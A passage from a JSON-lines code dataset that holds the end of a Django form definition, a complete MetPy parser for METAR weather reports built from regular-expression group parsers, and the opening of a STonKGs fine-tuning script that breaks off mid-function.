forms.ChoiceField(label='Field MultiChoices', widget=forms.CheckboxSelectMultiple, choices=CHOICES3 ) ","sub_path":"djapps/djajax/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635685018","text":"from __future__ import division\nimport logging\nimport re\nfrom collections import namedtuple\nfrom datetime import datetime\n\nfrom ..package_tools import Exporter\nfrom .text import ParseError, RegexParser, WMOTextProduct, parse_wmo_time\nfrom ..units import units\n\nexporter = Exporter(globals())\n\nlog = logging.getLogger('metpy.io.metar')\nlog.addHandler(logging.StreamHandler()) # Python 2.7 needs a handler set\nlog.setLevel(logging.WARNING)\n\n\ndef raise_parse_error(msg, *args):\n 'Format message and raise as an error'\n raise ParseError(msg % args)\n\n\nclass MetarProduct(WMOTextProduct):\n def _parse(self, it):\n # Handle NWS style where it's just specified once at the top rather than per METAR\n if it.peek() in ('METAR', 'SPECI'):\n def_kind = next(it)\n else:\n def_kind = 'METAR'\n\n it.linesep = '=[\\n]{0,2}'\n self.reports = []\n\n parser = MetarParser(default_kind=def_kind, ref_time=self.datetime)\n for l in it:\n # Skip SAOs\n if l[3:7] != ' SA ':\n report = parser.parse(l)\n # Only add the report if it's not empty\n if report:\n self.reports.append(report)\n\n def __str__(self):\n return (super(MetarProduct, self).__str__() + '\\n\\tReports:' +\n '\\n\\t\\t'.join(map(str, self.reports)))\n\n\ndef as_value(val, units):\n 'Parse a value from a METAR report, attaching units'\n try:\n if val is None:\n return None\n elif val[0] in 'MP':\n log.warning('Got unhandled M/P value: %s', val)\n val = val[1:]\n elif val == '/' * len(val):\n val = 'NaN'\n return float(val) * units\n except (AttributeError, TypeError, ValueError) as e:\n raise ParseError('Could not parse \"%s\" as a value' % val)\n\n\n# Helper for parsing. Generates a function to grab a given group from the matches, optionally\n# applying a converter\ndef grab_group(group, conv=None):\n if conv:\n def process(matches, *args):\n return conv(matches[group])\n else:\n def process(matches, *args):\n return matches[group]\n return process\n\n\nclass MetarParser(object):\n 'Class that parses a single METAR report'\n def __init__(self, default_kind='METAR', ref_time=None):\n # Reports should start with METAR/SPECI, but of course NWS doesn't actually\n # do this...\n self.default_kind = default_kind\n\n # Can specify the appropriate date for year/month. Defaults to using current\n self.ref_time = ref_time if ref_time else datetime.utcnow()\n\n # Main expected groups in the report\n self.main_groups = [('kind', kind(default_kind)), ('stid', stid),\n ('datetime', dt(ref_time)), ('null', null), ('auto', auto),\n ('corrected', corrected),\n ('wind', wind), ('visibility', vis), ('runway_range', rvr),\n ('present_wx', wx), ('sky_coverage', sky_cover),\n ('temperature', basic_temp), ('altimeter', altimeter),\n ('runway_state', runway_state)]\n\n # Complete set of possible groups in the remarks section\n self.remarks = [('volcano', volcano), ('automated', automated_type),\n ('peak_wind', peak_wind), ('wind_shift', wind_shift),\n ('sfc_vis', sfc_vis),\n ('variable_vis', var_vis), ('sector_vis', sector_vis),\n ('lightning', lightning),\n ('precip_times', precip_times), ('thunderstorm', thunderstorm),\n ('virga', virga),\n ('variable_ceiling', var_ceiling), ('variable_sky_cover', var_sky),\n ('significant_clouds', sig_cloud), ('mountains', mountains),\n ('pressure_change', pressure_change),\n ('sea_level_pressure', slp), ('no_speci', nospeci),\n ('report_sequence', report_sequence),\n ('hourly_precip', hourly_precip), ('period_precip', period_precip),\n ('snow_6hr', snow_6hr), ('snow_depth', snow_depth),\n ('snow_liquid_equivalent', snow_liquid_equivalent),\n ('hourly_ice', hourly_ice), ('ice_3hr', ice_3hr), ('ice_6hr', ice_6hr),\n ('daily_precip', daily_precip), ('cloud_types', cloud_types),\n ('hourly_temperature', hourly_temp), ('max_temp_6hr', max_temp_6hr),\n ('min_temp_6hr', min_temp_6hr),\n ('daily_temperature', daily_temp_range),\n ('pressure_tendency_3hr', press_tend),\n ('non-operational sensors', non_op_sensors),\n ('pilot', pilot_remark), ('needs_maintenance', maint), ('null', null)]\n\n self.clean_whitespace = re.compile('\\s+')\n\n def parse(self, report):\n 'Parses the report and returns a dictionary of parsed results'\n report = self.clean_whitespace.sub(' ', report)\n ob = dict(report=report, null=False)\n\n # Split into main and remark sections so we can treat slightly differently\n if 'RMK' in report:\n main, remark = report.split('RMK', 1)\n else:\n main = report\n remark = ''\n\n # Handle badly formatted report where there is no main section\n if not main.strip():\n return dict()\n\n # Need to split out the trend forecast, otherwise will break parsing\n split = trend_forecast_regex.split(main, 1)\n if len(split) > 1:\n main, match, trend = trend_forecast_regex.split(main, 1)\n trend = trend.strip()\n if trend:\n trend_store = dict()\n trend = self._look_for_groups(trend, self.main_groups, trend_store)\n trend_store['unparsed'] = trend\n ob['trend_forecast'] = (match, trend_store)\n else:\n ob['trend_forecast'] = match\n\n # Start with the main groups. Get back what remains of the report\n main = self._look_for_groups(main, self.main_groups, ob)\n\n # If we have anything left now, it's un-parsed data and we should flag it. We check\n # to make sure it's actually useful leftovers\n if main and set(main) - set(' /'):\n ob['unparsed'] = main.strip()\n\n # If we have a remarks section, try to parse it\n if remark:\n # The groups in the remarks rely upon information from earlier in the report,\n # like the current time or units\n speed_units = ob['wind']['speed'].units if 'wind' in ob else units.knot\n context = dict(datetime=ob.get('datetime', self.ref_time),\n speed_units=units.Quantity(1.0, speed_units))\n\n remark = self._look_for_groups_reduce(remark, self.remarks, ob, context)\n if remark:\n ob['remarks'] = remark\n\n # Handle parsing garbage by checking for either datetime or null report\n if ob['null'] or ('datetime' in ob and 'stid' in ob):\n return ob\n else:\n return dict()\n\n def _look_for_groups(self, string, groups, store, *context):\n # Walk through the list of (name, group) and try parsing the report with the group.\n # This will return the string that was parsed, so that we can keep track of where\n # we are in the string. We use a while loop so that we can repeat a group if\n # appropriate.\n string = string.strip()\n cursor = 0\n leftover = []\n groups = iter(groups)\n name, group = next(groups)\n while True:\n # Skip spaces and newlines, won't exceed end because no trailing whitespace\n while string[cursor] == ' ':\n cursor += 1\n\n # Try to parse using the group.\n try:\n rng, data = group.parse(string, cursor, *context)\n except ParseError as e:\n log.exception('Error while parsing (%s)', string, exc_info=e)\n rng = data = None\n\n # If we got back a range, that means the group succeeded in parsing\n if rng:\n start, end = rng\n log.debug('%s parsed %s', name, string[start:end])\n\n # If the match didn't start at the cursor, that means we skipped some\n # data and should flag as necessary\n if start > cursor:\n leftover.append(string[cursor:start].strip())\n\n # Update the cursor in the string to where the group finished parsing\n cursor = end\n\n # If we got back some data, we should store. Possible to get back a default\n # value even if no parsing done.\n if data is not None:\n log.debug('%s returned %s', name, data)\n\n # If it's a repeated group, we store in a list regardless\n if group.repeat and group.keepall:\n store.setdefault(name, []).append(data)\n else:\n store[name] = data\n\n # If we've finished the string, get out\n if cursor >= len(string):\n break\n\n # If we shouldn't repeat the group, get the next one\n if not group.repeat or data is None:\n try:\n name, group = next(groups)\n except StopIteration:\n break\n\n # Return what remains of the string (removing whitespace)\n leftover.append(string[cursor:].strip())\n return ' '.join(leftover)\n\n def _look_for_groups_reduce(self, string, groups, store, *context):\n # Walk through the list of (name, group) and try parsing the report with the group.\n # This will return the string that was parsed, so that we can keep track of where\n # we are in the string. We use a while loop so that we can repeat a group if\n # appropriate.\n string = string.strip()\n groups = iter(groups)\n name, group = next(groups)\n while True:\n # Try to parse using the group.\n rng, data = group.parse(string, 0, *context)\n\n # If we got back a range, that means the group succeeded in parsing\n if rng:\n start, end = rng\n log.debug('%s parsed %s', name, string[start:end])\n\n string = string[:start].strip() + ' ' + string[end:].strip()\n\n # If we got back some data, we should store. Possible to get back a default\n # value even if no parsing done.\n if data is not None:\n log.debug('%s returned %s', name, data)\n\n # If it's a repeated group, we store in a list regardless\n if group.repeat and group.keepall:\n store.setdefault(name, []).append(data)\n else:\n store[name] = data\n\n # If we shouldn't repeat the group, get the next one\n if not group.repeat or data is None:\n try:\n name, group = next(groups)\n except StopIteration:\n break\n\n # Return what remains of the string (removing whitespace)\n return string.strip()\n\n#\n# Parsers for METAR groups -- main report\n#\n\n\n# Parse out METAR/SPECI\ndef kind(default):\n return RegexParser(r'\\b(?PMETAR|SPECI)\\b', grab_group('kind'), default=default)\n\n# Grab STID (CCCC)\nstid = RegexParser(r'\\b(?P[0-9A-Z]{4})\\b', grab_group('stid'))\n\n\n# Process the datetime in METAR to a full datetime (YYGGggZ)\ndef dt(ref_time):\n return RegexParser(r'\\b(?P[0-3]\\d[0-5]\\d[0-5]\\dZ)',\n lambda matches: parse_wmo_time(matches['datetime'], ref_time))\n\n# Look for AUTO\nauto = RegexParser(r'\\b(?PAUTO)', grab_group('auto', bool), default=False)\n\n# Look for COR\ncorrected = RegexParser(r'\\b(?PCOR)\\b', grab_group('cor', bool), default=False)\n\n# Look for NIL reports\nnull = RegexParser(r'\\b(?PNIL)', grab_group('null', bool), default=False)\n\n\n# Process the full wind group (dddfffGfffKT dddVddd)\ndef process_wind(matches):\n speed_unit = units('m/s') if matches.pop('units') == 'MPS' else units.knot\n if matches['direction'] != 'VRB':\n matches['direction'] = as_value(matches['direction'], units.deg)\n matches['speed'] = as_value(matches['speed'], speed_unit)\n matches['gust'] = as_value(matches['gust'], speed_unit)\n matches['dir1'] = as_value(matches['dir1'], units.deg)\n matches['dir2'] = as_value(matches['dir2'], units.deg)\n return matches\n\nwind = RegexParser(r'''(?PVRB|///|[0-3]\\d{2})\n (?PP?[\\d]{2,3}|//)\n (G(?PP?\\d{2,3}))?\n ((?PKT|MPS)|\\b|\\ )\n (\\ (?P\\d{3})V(?P\\d{3}))?''', process_wind)\n\n\n# The visibilty group (VVVVV)\nfrac_conv = {'1/4': 1 / 4, '1/2': 1 / 2, '3/4': 3 / 4,\n '1/8': 1 / 8, '3/8': 3 / 8, '5/8': 5 / 8, '7/8': 7 / 8,\n '1/16': 1 / 16, '3/16': 3 / 16, '5/16': 5 / 16, '7/16': 7 / 16,\n '9/16': 9 / 16, '11/16': 11 / 16, '13/16': 13 / 16, '15/16': 15 / 16}\n\n\ndef frac_to_float(frac):\n try:\n return frac_conv[frac]\n except KeyError:\n raise ParseError('%s is not a valid visibility fraction' % frac)\n\n\ndef vis_to_float(dist, units):\n 'Convert visibility, including fraction, to a value with units'\n if dist[0] == 'M':\n dist = dist[1:]\n dist = dist.strip()\n\n if '/' in dist:\n # Handle the case where the entire group is all '////'\n if dist[0] == '/' and all(c == '/' for c in dist):\n return float('nan') * units\n parts = dist.split(maxsplit=1)\n if len(parts) > 1:\n return as_value(parts[0], units) + frac_to_float(parts[1]) * units\n else:\n return frac_to_float(dist) * units\n else:\n return as_value(dist, units)\n\n\ndef process_vis(matches):\n if matches['cavok']:\n return 'CAVOK'\n elif matches['vismiles']:\n return vis_to_float(matches['vismiles'], units.mile)\n elif matches['vismetric']:\n return as_value(matches['vismetric'], units.meter)\n\nvis = RegexParser(r'''(?PCAVOK)|\n ((?PM?(([1-9]\\d?)|(([12][ ]?)?1?[13579]/1?[2468])|////))SM\\b)|\n (?P\\b\\d{4}\\b)''', process_vis)\n\n\n# Runway visual range (RDD/VVVV(VVVVV)FT)\ndef to_rvr_value(dist, units):\n if dist[0] in ('M', 'P'):\n dist = dist[1:]\n return as_value(dist, units)\n\n\ndef process_rvr(matches):\n dist_units = units(matches.pop('units').lower())\n ret = dict()\n ret[matches['runway']] = to_rvr_value(matches['distance'], dist_units)\n if matches['max_dist']:\n ret[matches['runway']] = (ret[matches['runway']],\n to_rvr_value(matches['max_dist'], dist_units))\n if matches['change']:\n change_map = dict(D='down', U='up', N='no change')\n ret[matches['runway']] = (ret[matches['runway']], change_map[matches['change']])\n\n return ret\n\nrvr = RegexParser(r'''R(?P\\d{2}[RLC]?)\n /(?P[MP]?\\d{4})\n (V(?P[MP]?\\d{4}))?\n (?PFT)/?(?P[UDN])?''', process_rvr)\n\n\n# Present weather (w'w')\nprecip_abbr = {'DZ': 'Drizzle', 'RA': 'Rain', 'SN': 'Snow', 'SG': 'Snow Grains',\n 'IC': 'Ice Crystals', 'PL': 'Ice Pellets', 'GR': 'Hail',\n 'GS': 'Small Hail or Snow Pellets', 'UP': 'Unknown Precipitation',\n 'RASN': 'Rain and Snow'}\n\n\nclass Weather(namedtuple('WxBase', 'mod desc precip obscur other')):\n lookups = [{'-': 'Light', '+': 'Heavy', 'VC': 'In the vicinity'},\n {'MI': 'Shallow', 'PR': 'Partial', 'BC': 'Patches', 'DR': 'Low Drifting',\n 'BL': 'Blowing', 'SH': 'Showers', 'TS': 'Thunderstorm', 'FZ': 'Freezing'},\n precip_abbr,\n {'BR': 'Mist', 'FG': 'Fog', 'FU': 'Smoke', 'VA': 'Volcanic Ash',\n 'DU': 'Widespread Dust', 'SA': 'Sand', 'HZ': 'Haze', 'PY': 'Spray'},\n {'PO': 'Well-developed Dust/Sand Whirls', 'SQ': 'Squalls', 'FC': 'Funnel Cloud',\n 'SS': 'Sandstorm', 'DS': 'Duststorm'}]\n\n @classmethod\n def fillin(cls, **kwargs):\n args = [None] * 5\n base = cls(*args)\n return base._replace(**kwargs)\n\n def __str__(self):\n if self.mod == '+' and self.other == 'FC':\n return 'Tornado'\n\n return ' '.join(lookup[val] for val, lookup in zip(self, self.lookups) if val)\n\n\ndef process_wx(matches):\n if matches['vdesc']:\n matches['mod'] = matches.pop('vicinity')\n matches['desc'] = matches.pop('vdesc')\n if matches['desc'] == 'ST':\n matches['desc'] = 'TS'\n else:\n matches.pop('vdesc')\n matches.pop('vicinity')\n\n return Weather(**matches)\n\nwx = RegexParser(r'''(((?P[-+])|\\b) # Begin with one of these mods or nothing\n (?PMI|PR|BC|DR|BL|SH|TS|FZ)?\n ((?P(DZ|RA|SN|SG|IC|PL|GR|GS|UP){1,3})\n |(?PBR|FG|FU|VA|DU|SA|HZ|PY)\n |(?PPO|SQ|FC|SS|DS)))\n |((?PVC)?(?PSH|TS|ST))''', process_wx, repeat=True)\n\n\n# Sky condition (NNNhhh or VVhhh or SKC/CLR)\ndef process_sky(matches):\n coverage_to_value = dict(VV=8, FEW=2, SCT=4, BKN=6, BKM=6, OVC=8)\n if matches.pop('clear'):\n return float('nan'), 0, None\n hgt = as_value(matches['height'], 100 * units.feet)\n return hgt, coverage_to_value[matches['coverage']], matches['cumulus']\n\nsky_cover = RegexParser(r'''\\b(?PSKC|CLR|NSC|NCD)\\b|\n ((?PVV|FEW|SCT|BK[MN]|OVC)\n \\ ?(?P\\d{3})\n (?PCB|TCU)?)''', process_sky, repeat=True)\n\n\n# Temperature/Dewpoint group -- whole values (TT/TdTd)\ndef parse_whole_temp(temp):\n if temp in ('//', 'MM'):\n return float('NaN') * units.degC\n elif temp.startswith('M'):\n return -as_value(temp[1:], units.degC)\n else:\n return as_value(temp, units.degC)\n\n\ndef process_temp(matches):\n temp = parse_whole_temp(matches['temperature'])\n if matches['dewpoint']:\n dewpt = parse_whole_temp(matches['dewpoint'])\n else:\n dewpt = float('NaN') * units.degC\n\n return temp, dewpt\n\nbasic_temp = RegexParser(r'''(?P(M?\\d{2})|MM)/\n (?P(M?[\\d]{1,2})|//|MM)?''', process_temp)\n\n\n# Altimeter setting (APPPP)\ndef process_altimeter(matches):\n if matches['unit'] == 'A':\n alt_unit = 0.01 * units.inHg\n else:\n alt_unit = units('mbar')\n return as_value(matches['altimeter'], alt_unit)\n\naltimeter = RegexParser(r'\\b(?P[AQ])(?P\\d{4})', process_altimeter,\n repeat=True, keepall=False)\n\n#\n# Extended International groups\n#\n\n# Runway conditions\nrunway_extent = {'1': 0.1, '2': 0.25, '5': 0.5, '9': 1.0, '/': float('NaN')}\nrunway_contaminant = {'0': 'Clear and dry', '1': 'Damp', '2': 'Wet and water patches',\n '3': 'Rime and frost covered', '4': 'Dry snow', '5': 'Wet snow',\n '6': 'Slush', '7': 'Ice', '8': 'Compacted or rolled snow',\n '9': 'Frozen ruts or ridges', '/': 'No Report'}\n\n\ndef runway_code_to_depth(code):\n if code == '//':\n return float('NaN') * units.mm\n code = int(code)\n if code < 91:\n return code * units.mm\n elif code < 99:\n return (code - 90) * 5 * units.cm\n else:\n return 'Inoperable'\n\n\ndef runway_code_to_braking(code):\n if code == '//':\n return float('NaN')\n code = int(code)\n if code < 91:\n return float(code) / 100\n else:\n return {91: 'poor', 92: 'medium/poor', 93: 'medium', 94: 'medium/good',\n 95: 'good'}.get(code, 'unknown')\n\n\ndef process_runway_state(matches):\n if matches['deposit']:\n matches['deposit'] = runway_contaminant.get(matches['deposit'], 'Unknown')\n if matches['extent']:\n matches['extent'] = runway_extent.get(matches['extent'], 'Unknown')\n if matches['depth']:\n matches['depth'] = runway_code_to_depth(matches['depth'])\n\n matches['cleared'] = bool(matches['cleared'])\n matches['braking'] = runway_code_to_braking(matches['braking'])\n\n return matches\n\n\nrunway_state = RegexParser(r'''\\bR(?P\\d{2})\n /((?P[\\d/])(?P[\\d/])(?P\\d{2}|//)|(?PCLRD))?\n (?P\\d{2}|//)''', process_runway_state)\n\n# Trend forecast (mostly international)\ntrend_forecast_regex = re.compile(r'\\b(?PNOSIG|BECMG|TEMPO)')\n\n#\n# Parsers for METAR groups -- remarks\n#\n\n\n# Combine time in the remark with the report datetime to make a proper datetime object\ndef process_time(matches, context):\n repl = dict(minute=int(matches['minute']))\n if matches['hour']:\n repl['hour'] = int(matches['hour'])\n\n return context['datetime'].replace(**repl)\n\n# Volcanic eruption, first in NWS reports\nvolcano = RegexParser(r'[A-Z0-9 .]*VOLCANO[A-Z0-9 .]*')\n\n# Type of automatic station\nautomated_type = RegexParser(r'\\bA[O0][12]A?')\n\n\n# Peak wind remark (PK WND dddfff/hhmm)\ndef process_peak_wind(matches, context):\n peak_time = process_time(matches, context)\n return dict(time=peak_time, speed=as_value(matches['speed'], context['speed_units']),\n direction=as_value(matches['direction'], units.deg))\n\npeak_wind = RegexParser(r'''\\bPK\\ WND\\ ?(?P\\d{3})\n (?P\\d{2,3})/\n (?P\\d{2})?\n (?P\\d{2})''', process_peak_wind)\n\n\n# Wind shift (WSHFT hhmm)\ndef process_shift(matches, context):\n time = process_time(matches, context)\n front = bool(matches['frontal'])\n return dict(time=time, frontal=front)\n\nwind_shift = RegexParser(r'''\\bWSHFT\\ (?P\\d{2})?\n (?P\\d{2})\n \\ (?PFROPA)?''', process_shift)\n\n\n# Tower/surface visibility (TWR(SFC) VIS vvvvv)\ndef process_twrsfc_vis(matches, *args):\n abbr_to_kind = dict(TWR='tower', SFC='surface')\n return {abbr_to_kind[matches['kind']]: vis_to_float(matches['vis'], units.mile)}\n\nsfc_vis = RegexParser(r'''(?PTWR|SFC)\\ VIS\n \\ (?P[0-9 /]{1,5})''', process_twrsfc_vis)\n\n\n# Variable prevailing visibility (VIS vvvvvVvvvvv)\ndef process_var_vis(matches, *args):\n vis1 = vis_to_float(matches['vis1'], units.mile)\n vis2 = vis_to_float(matches['vis2'], units.mile)\n return vis1, vis2\n\nvar_vis = RegexParser(r'''VIS\\ (?PM?[0-9 /]{1,5})V\n (?P[0-9 /]{1,5})''', process_var_vis)\n\n\n# Sector visibility (VIS DIR vvvvv)\ndef process_sector_vis(matches, *args):\n # compass_to_float = dict(N=0, NE=45, E=90, SE=135, S=180, SW=225, W=270, NW=315)\n vis = vis_to_float(matches['vis'], units.mile)\n return {matches['direc']: vis}\n\nsector_vis = RegexParser(r'''VIS\\ (?P[NSEW]{1,2})\n \\ (?P[0-9 /]{1,5})''', process_sector_vis)\n\n\n# Lightning\ndef process_lightning(matches, *args):\n if not matches['dist']:\n matches.pop('dist')\n\n if not matches['loc']:\n matches.pop('loc')\n\n if not matches['type']:\n matches.pop('type')\n else:\n type_str = matches['type']\n matches['type'] = []\n while type_str:\n matches['type'].append(type_str[:2])\n type_str = type_str[2:]\n\n if not matches['frequency']:\n matches.pop('frequency')\n\n return matches\n\nlightning = RegexParser(r'''((?POCNL|FRQ|CONS)\\ )?\n \\bLTG(?P(IC|CG|CC|CA)+)?\n \\ ((?POHD|VC|DSNT)\\ )?\n (?P([NSEW\\-]|ALQD?S|\\ AND\\ |\\ THRU\\ )+)?\\b''',\n process_lightning)\n\n# Precipitation/Thunderstorm begin and end\nprecip_times_regex = re.compile(r'([BE])(\\d{2,4})')\n\n\ndef process_precip_times(matches, context):\n ref_time = context['datetime']\n kind = matches['precip']\n times = []\n start = None\n for be, time in precip_times_regex.findall(matches['times']):\n if len(time) == 2:\n time = ref_time.replace(minute=int(time))\n else:\n time = ref_time.replace(hour=int(time[:2]), minute=int(time[2:4]))\n\n if be == 'B':\n start = time\n else:\n if start:\n times.append((start, time))\n start = None\n else:\n times.append((None, time))\n\n if start:\n times.append((start, None))\n\n return kind, times\n\nprecip_times = RegexParser(r'''(SH)?(?PTS|DZ|FZRA|RA|SN|SG|IC|PL|GR|GS|UP)\n (?P([BE]([0-2]\\d)?[0-5]\\d)+)''',\n process_precip_times, repeat=True)\n\n\n# Thunderstorm (TS LOC MOV DIR)\ndef process_thunderstorm(matches, *args):\n return matches\n\nthunderstorm = RegexParser(r'''\\bTS\\ (?P[NSEW\\-]+)(\\ MOV\\ (?P[NSEW\\-]+))?''',\n process_thunderstorm)\n\n# Virga\nvirga = RegexParser(r'''\\bVIRGA\\ (?P[NSEW\\-])''', grab_group('direction'))\n\n\n# Variable Ceiling\ndef process_var_ceiling(matches, *args):\n return (as_value(matches['ceil1'], 100 * units.feet),\n as_value(matches['ceil2'], 100 * units.feet))\n\nvar_ceiling = RegexParser(r'\\bCIG\\ (?P\\d{3})V(?P\\d{3})\\b', process_var_ceiling)\n\n\n# Variable sky cover\ndef process_var_sky(matches, *args):\n matches['height'] = as_value(matches['height'], 100 * units.feet)\n matches['cover'] = (matches.pop('cover1'), matches.pop('cover2'))\n return matches\n\nvar_sky = RegexParser(r'''\\b(?PCLR|FEW|SCT|BKN|OVC)\n (?P\\d{3})?\\ V\n \\ (?PCLR|FEW|SCT|BKN|OVC)''', process_var_sky)\n\n# Mountains obscured\nmountains = RegexParser(r'''\\bMTNS?(\\ PTLY)?(\\ OBSCD?)?(\\ DSNT)?(\\ [NSEW\\-]+)?''')\n\n# Significant cloud types (CLD DIR (MOV DIR))\nsig_cloud = RegexParser(r'''(?PCB(MAM)?|TCU|ACC|[ACS]CSL|(APRNT\\ ROTOR\\ CLD))\n \\ (?PVC\\ ALQD?S|[NSEW-]+)(\\ MOV\\ (?P[NSEW]{1,2}))?''')\n\n\n# Cloud Types (8/ClCmCh)\ndef process_cloud_types(matches, *args):\n ret = dict()\n for k, v in matches.items():\n if v == '/':\n ret[k] = None\n else:\n ret[k] = int(v)\n return ret\n\ncloud_types = RegexParser(r'''\\b8/(?P[\\d/])(?P[\\d/])(?P[\\d/])''',\n process_cloud_types)\n\n\n# Pressure changes (PRESRR/PRESFR)\ndef process_pressure_change(matches, *args):\n if matches['tend'] == 'R':\n return 'rising rapidly'\n else:\n return 'falling rapidly'\n\npressure_change = RegexParser(r'\\bPRES(?P[FR])R\\b', process_pressure_change)\n\n\n# Sea-level pressure (SLPppp)\ndef process_slp(matches, *args):\n if matches['slp'] == 'NO':\n matches['slp'] = 'NaN'\n\n slp = as_value(matches['slp'], 0.1 * units('mbar'))\n if slp < 50 * units('mbar'):\n slp += 1000 * units('mbar')\n else:\n slp += 900 * units('mbar')\n return slp\n\nslp = RegexParser(r'SLP(?P\\d{3}|NO)', process_slp)\n\n\n# No SPECI\nnospeci = RegexParser(r'\\bNO(\\ )?SPECI')\n\n# First/last report\nreport_sequence = RegexParser(r'''\\b(FIRST|LAST)''')\n\n\n# Parse precip report\ndef parse_rmk_precip(precip):\n return as_value(precip, 0.01 * units.inch)\n\n\n# Hourly Precip (Prrrr)\nhourly_precip = RegexParser(r'\\bP(?P\\d{4})\\b', grab_group('precip', parse_rmk_precip))\n\n# 3/6-hour precip (6RRRR)\nperiod_precip = RegexParser(r'\\b6(?P\\d{4}|////)',\n grab_group('precip', parse_rmk_precip))\n\n\n# Parse snow report\ndef parse_rmk_snow(snow):\n return as_value(snow, 0.1 * units.inch)\n\n# 6-hour snow (931RRR)\nsnow_6hr = RegexParser(r'\\b931(?P\\d{3})\\b', grab_group('snow', parse_rmk_snow))\n\n\ndef parse_rmk_snow_depth(snow):\n return as_value(snow, units.inch)\n\n# Snow depth\nsnow_depth = RegexParser(r'\\b4/(?P\\d{3})\\b', grab_group('snow', parse_rmk_snow_depth))\n\n# Snow liquid equivalent (933RRR)\nsnow_liquid_equivalent = RegexParser(r'\\b933(?P\\d{3})\\b',\n grab_group('snow', parse_rmk_snow))\n\n# 24-hour precip (7RRRR)\ndaily_precip = RegexParser(r'\\b7(?P\\d{4}|////)',\n grab_group('precip', parse_rmk_precip))\n\n# Hourly ice accretion (I1RRR)\nhourly_ice = RegexParser(r'\\bI1(?P\\d{3})', grab_group('ice', parse_rmk_precip))\n\n# 3-hour ice accretion (I3RRR)\nice_3hr = RegexParser(r'\\bI3(?P\\d{3})', grab_group('ice', parse_rmk_precip))\n\n# 6-hour ice accretion (I6RRR)\nice_6hr = RegexParser(r'\\bI6(?P\\d{3})', grab_group('ice', parse_rmk_precip))\n\n\n# Handles parsing temperature format from remarks\ndef parse_rmk_temp(temp):\n if temp.startswith('1'):\n return -as_value(temp[1:], 0.1 * units.degC)\n else:\n return as_value(temp, 0.1 * units.degC)\n\n\n# Hourly temperature (TsTTTsTdTdTd)\ndef process_hourly_temp(matches, *args):\n temp = parse_rmk_temp(matches['temperature'])\n if matches['dewpoint']:\n dewpt = parse_rmk_temp(matches['dewpoint'])\n else:\n dewpt = float('NaN') * units.degC\n return temp, dewpt\n\nhourly_temp = RegexParser(r'''\\bT(?P[01]\\d{3})\n (?P[01]\\d{3})?''', process_hourly_temp)\n\n\n# 6-hour max temp (1sTTT)\nmax_temp_6hr = RegexParser(r'\\b1(?P[01]\\d{3})\\b',\n grab_group('temperature', parse_rmk_temp))\n\n# 6-hour max temp (1sTTT)\nmin_temp_6hr = RegexParser(r'\\b2(?P[01]\\d{3})\\b',\n grab_group('temperature', parse_rmk_temp))\n\n\n# 24-hour temp (4sTTTsTTT)\ndef process_daily_temp(matches, *args):\n return parse_rmk_temp(matches['min']), parse_rmk_temp(matches['max'])\n\ndaily_temp_range = RegexParser(r'\\b4(?P[01]\\d{3})\\ ?(?P[01]\\d{3})\\b',\n process_daily_temp)\n\n\n# 3-hour pressure tendency (5appp)\ndef process_press_tend(matches, *args):\n return int(matches['character']), as_value(matches['amount'], 0.1 * units.mbar)\n\npress_tend = RegexParser(r'5(?P[0-8])(?P\\d{3})\\b', process_press_tend)\n\n\n# Parse non-operational sensors\ndef process_nonop_sensors(matches, *args):\n sensors = dict(RVRNO='Runway Visual Range', PWINO='Present Weather Identifier',\n PNO='Precipitation', FZRANO='Freezing Rain Sensor',\n TSNO='Lightning Detection System', VISNO='Secondary Visibility Sensor',\n CHINO='Secondary Ceiling Height Indicator')\n if matches['nonop']:\n return sensors.get(matches['nonop'], matches['nonop'])\n if matches['nonop2']:\n return sensors.get(matches['nonop2'], matches['nonop2']), matches['loc']\n\nnon_op_sensors = RegexParser(r'''\\b(?PRVRNO|PWINO|PNO|FZRANO|TSNO)\n |((?PVISNO|CHINO)\\ (?P\\w+))''',\n process_nonop_sensors, repeat=True)\n\n# Some free-text remarks\npilot_remark = RegexParser(r'([\\w\\ ;\\.]*ATIS\\ \\w[\\w\\ ;\\.]*)|(QFE[\\d\\.\\ ]+)')\n\n# Parse maintenance flag\nmaint = RegexParser(r'(?P\\$)', grab_group('maint', bool), default=False)\n","sub_path":"metpy/io/metar.py","file_name":"metar.py","file_ext":"py","file_size_in_byte":31714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294616105","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Runs the STonKGs model on the fine-tuning classification task, assuming the model embeddings are pre-trained.\n\nRun with:\npython -m src.stonkgs.models.stonkgs_finetuning\n\"\"\"\n\nimport logging\nimport os\nfrom collections import Counter\nfrom typing import Dict, List, Optional\n\nimport click\nimport mlflow\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import KFold, StratifiedShuffleSplit\nfrom tqdm import tqdm\nfrom transformers.modeling_outputs import SequenceClassifierOutput\nfrom transformers.models.bert import BertModel, BertTokenizer, BertTokenizerFast\nfrom transformers.trainer import Trainer, TrainingArguments\n\nfrom stonkgs.constants import (\n CELL_LINE_DIR,\n CELL_TYPE_DIR,\n CORRECT_DIR,\n DEEPSPEED_CONFIG_PATH,\n DISEASE_DIR,\n EMBEDDINGS_PATH,\n LOCATION_DIR,\n MLFLOW_FINETUNING_TRACKING_URI,\n NLP_MODEL_TYPE,\n ORGAN_DIR,\n PRETRAINED_STONKGS_PATH,\n RANDOM_WALKS_PATH,\n RELATION_TYPE_DIR,\n SPECIES_DIR,\n STONKGS_OUTPUT_DIR,\n VOCAB_FILE,\n)\nfrom stonkgs.models.kg_baseline_model import prepare_df\nfrom stonkgs.models.stonkgs_model import STonKGsForPreTraining\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n# Disable alembic info\nlogging.getLogger(\"alembic\").setLevel(logging.WARNING)\n\n\ndef get_train_test_splits(\n train_data: pd.DataFrame,\n type_column_name: str = \"labels\",\n random_seed: int = 42,\n n_splits: int = 5,\n max_dataset_size: int = 100000,\n) -> List:\n \"\"\"Return train/test indices for n_splits many splits based on the fine-tuning dataset that is passed.\"\"\"\n # Leave out the label in the dataset\n data = train_data.drop(type_column_name, axis=1)\n labels = train_data[type_column_name]\n\n # Cut the dataset down to max_dataset_size (deterministically!) using StratifiedShuffleSplit if needed:\n # (this is not an actual train/test split, this is just for getting a dataset of size max_dataset_size in a\n # stratified and deterministic manner)\n if len(data) > max_dataset_size:\n splitter 